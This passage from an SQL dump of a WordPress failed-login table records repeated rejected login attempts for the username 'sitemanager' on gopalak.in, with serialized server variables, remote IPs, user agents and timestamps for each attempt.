00:00:00'),(94740,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55130\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.114.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746058625.723268;s:12:\"REQUEST_TIME\";i:1746058625;}}','198.54.114.126',0,'2025-05-01 05:47:07','1970-01-01 00:00:00'),(94741,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41970\";s:11:\"REMOTE_ADDR\";s:13:\"195.161.69.18\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746058941.53687;s:12:\"REQUEST_TIME\";i:1746058941;}}','195.161.69.18',0,'2025-05-01 05:52:23','1970-01-01 00:00:00');
INSERT INTO `wp_arm_fail_attempts` VALUES (94742,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37900\";s:11:\"REMOTE_ADDR\";s:13:\"185.8.173.159\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746059257.877435;s:12:\"REQUEST_TIME\";i:1746059257;}}','185.8.173.159',0,'2025-05-01 05:57:39','1970-01-01 00:00:00'),(94743,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59990\";s:11:\"REMOTE_ADDR\";s:14:\"95.217.147.111\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746059568.4031751;s:12:\"REQUEST_TIME\";i:1746059568;}}','95.217.147.111',0,'2025-05-01 06:02:50','1970-01-01 00:00:00'),(94744,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36388\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.114.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746059882.8815701;s:12:\"REQUEST_TIME\";i:1746059882;}}','198.54.114.126',0,'2025-05-01 06:08:04','1970-01-01 00:00:00'),(94745,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35010\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.95.176\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746060196.4889691;s:12:\"REQUEST_TIME\";i:1746060196;}}','157.230.95.176',0,'2025-05-01 06:13:18','1970-01-01 00:00:00'),(94746,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37422\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.125.232\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746060512.964879;s:12:\"REQUEST_TIME\";i:1746060512;}}','198.54.125.232',0,'2025-05-01 06:18:34','1970-01-01 00:00:00'),(94747,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44896\";s:11:\"REMOTE_ADDR\";s:13:\"8.218.212.177\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746060831.6868861;s:12:\"REQUEST_TIME\";i:1746060831;}}','8.218.212.177',0,'2025-05-01 06:23:53','1970-01-01 00:00:00'),(94748,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35274\";s:11:\"REMOTE_ADDR\";s:13:\"157.245.6.207\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746061137.7818429;s:12:\"REQUEST_TIME\";i:1746061137;}}','157.245.6.207',0,'2025-05-01 06:28:59','1970-01-01 00:00:00'),(94749,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43968\";s:11:\"REMOTE_ADDR\";s:12:\"86.104.37.37\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746061459.696522;s:12:\"REQUEST_TIME\";i:1746061459;}}','86.104.37.37',0,'2025-05-01 06:34:21','1970-01-01 00:00:00'),(94750,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 